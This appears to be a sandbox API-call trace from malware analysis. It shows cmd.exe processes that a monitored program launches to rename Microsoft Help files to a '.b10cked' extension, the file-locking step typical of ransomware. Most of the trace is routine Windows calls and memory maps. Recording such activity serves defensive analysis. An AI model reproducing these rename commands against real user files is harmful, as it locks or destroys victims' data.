[0196.090] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~2.HXW" (normalized: "c:\\users\\alluse~1\\micros~2\\hx_103~2.hxw")) returned 0x2022 [0196.090] SetErrorMode (uMode=0x0) returned 0x0 [0196.090] SetErrorMode (uMode=0x1) returned 0x0 [0196.090] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~2.HXW", nBufferLength=0x104, lpBuffer=0x24f558, lpFilePart=0x24f2f0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~2.HXW", lpFilePart=0x24f2f0*="HX_103~2.HXW") returned 0x27 [0196.090] SetErrorMode (uMode=0x0) returned 0x1 [0196.090] SetErrorMode (uMode=0x0) returned 0x0 [0196.090] SetErrorMode (uMode=0x1) returned 0x0 [0196.090] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\Hx_1033_MKWD_NamedURL.HxW.b10cked", 
nBufferLength=0x104, lpBuffer=0x24f760, lpFilePart=0x24f2f0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\Hx_1033_MKWD_NamedURL.HxW.b10cked", lpFilePart=0x24f2f0*="Hx_1033_MKWD_NamedURL.HxW.b10cked") returned 0x3c [0196.090] SetErrorMode (uMode=0x0) returned 0x1 [0196.090] SetLastError (dwErrCode=0x0) [0196.090] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\Hx_1033_MKWD_NamedURL.HxW.b10cked" (normalized: "c:\\users\\alluse~1\\micros~2\\hx_1033_mkwd_namedurl.hxw.b10cked")) returned 0xffffffff [0196.090] GetLastError () returned 0x2 [0196.090] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~2.HXW", fInfoLevelId=0x1, lpFindFileData=0x24ec6c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24ec6c) returned 0x2e0e90 [0196.091] FindNextFileW (in: hFindFile=0x2e0e90, lpFindFileData=0x24ec6c | out: lpFindFileData=0x24ec6c) returned 0 [0196.091] FindClose (in: hFindFile=0x2e0e90 | out: hFindFile=0x2e0e90) returned 1 [0196.091] GetLastError () returned 0x12 [0196.091] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~2.HXW", fInfoLevelId=0x1, lpFindFileData=0x24ec6c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24ec6c) returned 0x2e0e90 [0196.092] FindNextFileW (in: hFindFile=0x2e0e90, lpFindFileData=0x24ec6c | out: lpFindFileData=0x24ec6c) returned 0 [0196.092] FindClose (in: hFindFile=0x2e0e90 | out: hFindFile=0x2e0e90) returned 1 [0196.092] GetLastError () returned 0x12 [0196.093] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~2.HXW", fInfoLevelId=0x1, lpFindFileData=0x2f1bf8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2f1bf8) returned 0x2e0e90 [0196.093] FindNextFileW (in: hFindFile=0x2e0e90, lpFindFileData=0x2f1bf8 | out: lpFindFileData=0x2f1bf8) returned 0 [0196.093] FindClose (in: hFindFile=0x2e0e90 | out: hFindFile=0x2e0e90) returned 1 [0196.093] GetLastError () returned 
0x12 [0196.093] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~2.HXW", fInfoLevelId=0x1, lpFindFileData=0x2f1bf8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2f1bf8) returned 0x2e0e90 [0196.093] FindNextFileW (in: hFindFile=0x2e0e90, lpFindFileData=0x2f1bf8 | out: lpFindFileData=0x2f1bf8) returned 0 [0196.093] FindClose (in: hFindFile=0x2e0e90 | out: hFindFile=0x2e0e90) returned 1 [0196.093] GetLastError () returned 0x12 [0196.093] _get_osfhandle (_FileHandle=2) returned 0xb [0196.093] GetFileType (hFile=0xb) returned 0x2 [0196.220] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0196.220] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x24ee3c | out: lpMode=0x24ee3c) returned 1 [0196.220] _get_osfhandle (_FileHandle=2) returned 0xb [0196.220] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x24ee70 | out: lpConsoleScreenBufferInfo=0x24ee70) returned 1 [0196.221] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0196.222] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x24eeb0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0196.222] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x24ee94, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x24ee94*=0x2c) returned 1 [0196.222] longjmp () [0196.223] _get_osfhandle (_FileHandle=1) returned 0x7 [0196.223] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0196.223] _get_osfhandle (_FileHandle=1) returned 0x7 [0196.223] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0196.223] _get_osfhandle (_FileHandle=0) 
returned 0x3 [0196.223] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0196.223] SetConsoleInputExeNameW () returned 0x1 [0196.223] GetConsoleOutputCP () returned 0x1b5 [0196.223] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0196.223] SetThreadUILanguage (LangId=0x0) returned 0x409 [0196.223] exit (_Code=1) Process: id = "453" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16a20" os_pid = "0xa70" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXH\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\Hx_1033_MTOC_Hx.HxH.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 28928 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 28929 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 28930 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 28931 start_va = 0xf0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 28932 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = 
mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 28933 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 28934 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 28935 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 28936 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 28937 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 29007 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 29008 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 29009 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 29010 start_va = 0x2a0000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 29011 start_va = 0x500000 end_va = 0x50ffff entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 29012 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = 
"winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 29013 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 29014 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 29015 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 29016 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 29017 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 29018 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 29019 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 29020 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 29021 start_va = 0x3a0000 end_va = 0x467fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000003a0000" filename = "" Region: id = 29022 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 29023 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 29024 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 29025 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 29026 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 29027 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 29028 start_va = 0x510000 end_va = 0x610fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 29029 start_va = 0x620000 end_va = 0x121ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 29030 start_va = 0x1220000 end_va = 0x1382fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001220000" filename = "" Region: id = 29033 start_va = 0x1390000 end_va = 0x144ffff entry_point = 0x1390000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Thread: id = 648 os_tid = 0xbd8 [0196.626] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1efe94 | out: lpSystemTimeAsFileTime=0x1efe94*(dwLowDateTime=0xaa043480, 
dwHighDateTime=0x1d440a9)) [0196.626] GetCurrentProcessId () returned 0xa70 [0196.626] GetCurrentThreadId () returned 0xbd8 [0196.626] GetTickCount () returned 0x37b75 [0196.626] QueryPerformanceCounter (in: lpPerformanceCount=0x1efe8c | out: lpPerformanceCount=0x1efe8c*=25341544766) returned 1 [0196.627] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0196.627] __set_app_type (_Type=0x1) [0196.627] __p__fmode () returned 0x76b331f4 [0196.627] __p__commode () returned 0x76b331fc [0196.627] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0196.627] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0196.627] GetCurrentThreadId () returned 0xbd8 [0196.627] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xbd8) returned 0x38 [0196.627] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0196.627] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0196.627] SetThreadUILanguage (LangId=0x0) returned 0x409 [0196.628] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0196.628] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1efe24 | out: phkResult=0x1efe24*=0x0) returned 0x2 [0196.628] VirtualQuery (in: lpAddress=0x1efe5b, lpBuffer=0x1efdf4, dwLength=0x1c | out: lpBuffer=0x1efdf4*(BaseAddress=0x1ef000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0196.628] VirtualQuery (in: lpAddress=0xf0000, lpBuffer=0x1efdf4, dwLength=0x1c | out: lpBuffer=0x1efdf4*(BaseAddress=0xf0000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c 
[0196.628] VirtualQuery (in: lpAddress=0xf1000, lpBuffer=0x1efdf4, dwLength=0x1c | out: lpBuffer=0x1efdf4*(BaseAddress=0xf1000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0196.628] VirtualQuery (in: lpAddress=0xf3000, lpBuffer=0x1efdf4, dwLength=0x1c | out: lpBuffer=0x1efdf4*(BaseAddress=0xf3000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0196.628] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x1efdf4, dwLength=0x1c | out: lpBuffer=0x1efdf4*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0196.628] GetConsoleOutputCP () returned 0x1b5 [0196.628] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0196.628] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0196.628] _get_osfhandle (_FileHandle=1) returned 0x7 [0196.628] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0196.628] _get_osfhandle (_FileHandle=1) returned 0x7 [0196.628] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0196.628] _get_osfhandle (_FileHandle=1) returned 0x7 [0196.628] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0196.629] _get_osfhandle (_FileHandle=0) returned 0x3 [0196.629] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0196.629] _get_osfhandle (_FileHandle=0) returned 0x3 [0196.629] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0196.629] GetEnvironmentStringsW () returned 0x2b0180* [0196.629] FreeEnvironmentStringsW (penv=0x2b0180) returned 1 [0196.629] GetEnvironmentStringsW () returned 0x2b0180* [0196.629] FreeEnvironmentStringsW (penv=0x2b0180) returned 1 [0196.629] RegOpenKeyExW (in: hKey=0x80000002, 
lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1eed94 | out: phkResult=0x1eed94*=0x40) returned 0x0 [0196.629] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1eed9c, lpData=0x1eeda0, lpcbData=0x1eed98*=0x1000 | out: lpType=0x1eed9c*=0x0, lpData=0x1eeda0*=0xa8, lpcbData=0x1eed98*=0x1000) returned 0x2 [0196.629] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1eed9c, lpData=0x1eeda0, lpcbData=0x1eed98*=0x1000 | out: lpType=0x1eed9c*=0x4, lpData=0x1eeda0*=0x1, lpcbData=0x1eed98*=0x4) returned 0x0 [0196.629] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1eed9c, lpData=0x1eeda0, lpcbData=0x1eed98*=0x1000 | out: lpType=0x1eed9c*=0x0, lpData=0x1eeda0*=0x1, lpcbData=0x1eed98*=0x1000) returned 0x2 [0196.629] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1eed9c, lpData=0x1eeda0, lpcbData=0x1eed98*=0x1000 | out: lpType=0x1eed9c*=0x4, lpData=0x1eeda0*=0x0, lpcbData=0x1eed98*=0x4) returned 0x0 [0196.630] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1eed9c, lpData=0x1eeda0, lpcbData=0x1eed98*=0x1000 | out: lpType=0x1eed9c*=0x4, lpData=0x1eeda0*=0x40, lpcbData=0x1eed98*=0x4) returned 0x0 [0196.630] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1eed9c, lpData=0x1eeda0, lpcbData=0x1eed98*=0x1000 | out: lpType=0x1eed9c*=0x4, lpData=0x1eeda0*=0x40, lpcbData=0x1eed98*=0x4) returned 0x0 [0196.630] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1eed9c, lpData=0x1eeda0, lpcbData=0x1eed98*=0x1000 | out: lpType=0x1eed9c*=0x0, lpData=0x1eeda0*=0x40, lpcbData=0x1eed98*=0x1000) returned 0x2 [0196.630] RegCloseKey (hKey=0x40) returned 0x0 [0196.630] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, 
samDesired=0x2000000, phkResult=0x1eed94 | out: phkResult=0x1eed94*=0x40) returned 0x0 [0196.630] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1eed9c, lpData=0x1eeda0, lpcbData=0x1eed98*=0x1000 | out: lpType=0x1eed9c*=0x0, lpData=0x1eeda0*=0x40, lpcbData=0x1eed98*=0x1000) returned 0x2 [0196.630] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1eed9c, lpData=0x1eeda0, lpcbData=0x1eed98*=0x1000 | out: lpType=0x1eed9c*=0x4, lpData=0x1eeda0*=0x1, lpcbData=0x1eed98*=0x4) returned 0x0 [0196.630] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1eed9c, lpData=0x1eeda0, lpcbData=0x1eed98*=0x1000 | out: lpType=0x1eed9c*=0x0, lpData=0x1eeda0*=0x1, lpcbData=0x1eed98*=0x1000) returned 0x2 [0196.630] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1eed9c, lpData=0x1eeda0, lpcbData=0x1eed98*=0x1000 | out: lpType=0x1eed9c*=0x4, lpData=0x1eeda0*=0x0, lpcbData=0x1eed98*=0x4) returned 0x0 [0196.630] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1eed9c, lpData=0x1eeda0, lpcbData=0x1eed98*=0x1000 | out: lpType=0x1eed9c*=0x4, lpData=0x1eeda0*=0x9, lpcbData=0x1eed98*=0x4) returned 0x0 [0196.630] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1eed9c, lpData=0x1eeda0, lpcbData=0x1eed98*=0x1000 | out: lpType=0x1eed9c*=0x4, lpData=0x1eeda0*=0x9, lpcbData=0x1eed98*=0x4) returned 0x0 [0196.630] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1eed9c, lpData=0x1eeda0, lpcbData=0x1eed98*=0x1000 | out: lpType=0x1eed9c*=0x0, lpData=0x1eeda0*=0x9, lpcbData=0x1eed98*=0x1000) returned 0x2 [0196.630] RegCloseKey (hKey=0x40) returned 0x0 [0196.630] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88639e [0196.630] srand (_Seed=0x5b88639e) [0196.630] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move 
/Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXH\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\Hx_1033_MTOC_Hx.HxH.b10cked\"" [0196.630] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXH\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\Hx_1033_MTOC_Hx.HxH.b10cked\"" [0196.630] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0196.631] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2b18e0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0196.631] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0196.631] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0196.631] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0196.631] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0196.631] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0196.631] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0196.631] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0196.631] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0196.631] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0196.631] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0196.631] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0196.631] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0196.632] GetEnvironmentStringsW () returned 0x2b22d0* [0196.632] FreeEnvironmentStringsW (penv=0x2b22d0) returned 1 [0196.632] 
GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0196.632] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0196.632] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0196.632] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0196.632] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0196.632] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0196.632] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0196.632] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0196.632] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0196.632] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0196.632] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1efb60 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0196.632] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1efb60, lpFilePart=0x1efb5c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1efb5c*="Desktop") returned 0x18 [0196.632] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0196.632] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1ef8dc | out: lpFindFileData=0x1ef8dc) returned 0x2b0010 [0196.632] FindClose (in: hFindFile=0x2b0010 | out: hFindFile=0x2b0010) returned 1 [0196.632] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1ef8dc | out: lpFindFileData=0x1ef8dc) returned 0x2b0010 [0196.633] FindClose (in: hFindFile=0x2b0010 | out: hFindFile=0x2b0010) returned 1 [0196.633] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1ef8dc | out: lpFindFileData=0x1ef8dc) returned 0x2b0010 [0196.633] FindClose (in: hFindFile=0x2b0010 | out: hFindFile=0x2b0010) returned 1 
[0196.633] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0196.633] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0196.633] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0196.633] GetEnvironmentStringsW () returned 0x2b2af0* [0196.633] FreeEnvironmentStringsW (penv=0x2b2af0) returned 1 [0196.633] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0196.634] GetConsoleOutputCP () returned 0x1b5 [0196.634] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0196.634] GetUserDefaultLCID () returned 0x409 [0196.634] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0196.634] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1efca0, cchData=128 | out: lpLCData="0") returned 2 [0196.634] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1efca0, cchData=128 | out: lpLCData="0") returned 2 